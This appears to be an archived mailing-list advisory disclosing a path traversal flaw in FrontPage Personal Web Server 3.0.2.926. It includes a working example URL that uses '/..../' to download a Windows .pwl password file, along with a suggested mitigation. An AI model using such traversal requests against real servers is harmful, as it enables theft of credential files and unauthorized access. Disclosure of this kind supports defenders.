This is a multi-part message in MIME format. ------=_NextPart_000_0005_01BF7812.FB9D55C0 Content-Type: text/plain; charset="iso-8859-1" Content-Transfer-Encoding: quoted-printable Description: Doubledot bug in FrontPage FrontPage Personal Web Server. Compromise: Accessing drive trough browser. Vulnerable Systems: Frontpage-PWS32/3.0.2.926 other versions not tested. Details: When FrontPage-PWS runs a site on your c:\ drive your drive could be = accessed by any user accessing your page, simply by requesting any file = in any directory except the files in the FrontPage dir. specially = /_vti_pvt/. How to exploit this bug? Simply adding /..../ in the URL addressbar. http://www.target.com/..../>/<any_file> so by requesting http://www.target.com/..../Windows/Admin.pwl the = webserver let us download the .pwl file from the target. Files and dirs. with the hidden attribute set are vulnerable. Solution: The best solution is installing FrontPage on a drive that doesn't = contain Private information. Greetings, Jan van de Rijt aka The Warlock. ------=_NextPart_000_0005_01BF7812.FB9D55C0 Content-Type: text/html; charset="iso-8859-1" Content-Transfer-Encoding: quoted-printable <!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN"> <HTML><HEAD> <META content=3D"text/html; charset=3Diso-8859-1" = http-equiv=3DContent-Type> <META content=3D"MSHTML 5.00.2314.1000" name=3DGENERATOR> <STYLE></STYLE> </HEAD> <BODY bgColor=3D#ffffff> <DIV><FONT face=3DArial size=3D2>Description: Doubledot bug in FrontPage = FrontPage=20 Personal Web Server.<BR>Compromise: Accessing drive trough=20 browser.<BR>Vulnerable Systems: Frontpage-PWS32/3.0.2.926 other versions = not=20 tested.<BR>Details:<BR>When FrontPage-PWS runs a site on your c:\ drive = your=20 drive could be accessed by any user accessing your page, simply by = requesting=20 any file in any directory except the files in the FrontPage dir. = specially=20 /_vti_pvt/.</FONT></DIV> <DIV> </DIV> <DIV><FONT face=3DArial size=3D2>How to exploit this bug?<BR>Simply = adding /..../ in=20 the URL addressbar.</FONT></DIV> <DIV> </DIV> <DIV><FONT face=3DArial size=3D2><A=20 href=3D"http://www.target.com/..../<">http://www.target.com/..../<>= any_dir>/<any_file></FONT></DIV> <DIV> </DIV> <DIV><FONT face=3DArial size=3D2>so by requesting <A=20 href=3D"http://www.target.com/..../Windows/Admin.pwl">http://www.target.c= om/..../Windows/Admin.pwl</A> the=20 webserver let us download the .pwl file from the target.</FONT></DIV> <DIV> </DIV> <DIV><FONT face=3DArial size=3D2>Files and dirs. with the hidden = attribute set are=20 vulnerable.</FONT></DIV> <DIV> </DIV> <DIV><FONT face=3DArial size=3D2>Solution:<BR>The best solution is = installing=20 FrontPage on a drive that doesn't contain Private = information.</FONT></DIV> <DIV> </DIV> <DIV><FONT face=3DArial size=3D2>Greetings,</FONT></DIV> <DIV> </DIV> <DIV><FONT face=3DArial size=3D2>Jan van de Rijt aka The=20 Warlock.</FONT></DIV></BODY></HTML> ------=_NextPart_000_0005_01BF7812.FB9D55C0--
This archive was generated by hypermail 2b30 : Fri Apr 13 2001 - 15:35:08 PDT